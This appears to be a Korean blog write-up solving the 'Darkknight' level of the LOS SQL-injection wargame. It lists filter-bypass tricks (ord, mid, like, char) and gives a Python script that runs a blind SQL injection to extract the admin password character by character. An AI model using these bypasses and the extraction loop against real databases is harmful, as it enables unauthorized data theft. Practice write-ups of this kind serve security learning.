[Darkknight] LOS 문제풀기12

   [Darkknight] LOS 문제풀기12

SQL Injection Web Hacking

LOS 사이트 : http://los.eagle-jump.org/

[힌트]

1. 주석처리

   # : %23  ' : %27

2. 패스워드 하나씩 다 찾아야 함

3. ascii 우회 

   ord 사용

   ascii(substr(pw,1,1)) = ord(substr(pw,1,1))

4. char 함수 이용

5. substr 우회

    right, left, mid 사용

    substr('apple',1,1) = 'a'  ->  right(left('apple',1,1) = 'a'

    substr('apple',1,1) = 'a'  ->  mid('apple',1,1) = 'a'

6. = 우회

   like, between 이용

전 단계와 마찬가지로 패스워드를 하나씩 찾아야 되는 문제이다. 막아놓은 부분은 다 우회해서 처리하면 된다.

먼저 길이를 구한다. 여기서 주의할 점은 ' 를 막아놓았으므로 char 함수를 이용해서 문제를 풀어야 한다.

length 함수를 통해서 길이는 8글자라는 것을 확인 할 수 있다.

그리고 나서 패스워드를 하나씩 구하는데 ascii를 막아놓았으므로 ord를 이용해서 패스워드를 찾아내면 된다.

[Darkknight 자동화프로그램] - Python3

# LOS Darkknight
 
import socket
 
for i in range(1,9):
    for ch in range(48,123):
        if 58 <= ch <= 64: continue
        if 91 <= ch <= 96: continue
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect(('104.27.174.42',80))
 
        header = "GET /darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"
        header += "?pw=&no=1 or id like char(97,100,109,105,110) and ord(mid(pw,"+str(i)+",1)) like "+str(ch)+"%23 "
        header += "HTTP/1.1\r\n"
        header += "Host:los.eagle-jump.org\r\n"
        header += "Cookie:PHPSESSID=44b0qo6127nchlhrrohm2scc93\r\n"  #쿠키는 현재 갖고있는 세션값
        header += "\r\n"
 
        response = ''
    
        sock.send(header.encode())
        response = sock.recv(65535)
        response = response.decode()
        if "Hello admin" in response:
            print(chr(ch),end='',flush=True)
            sock.close()
            break;
        sock.close()
print()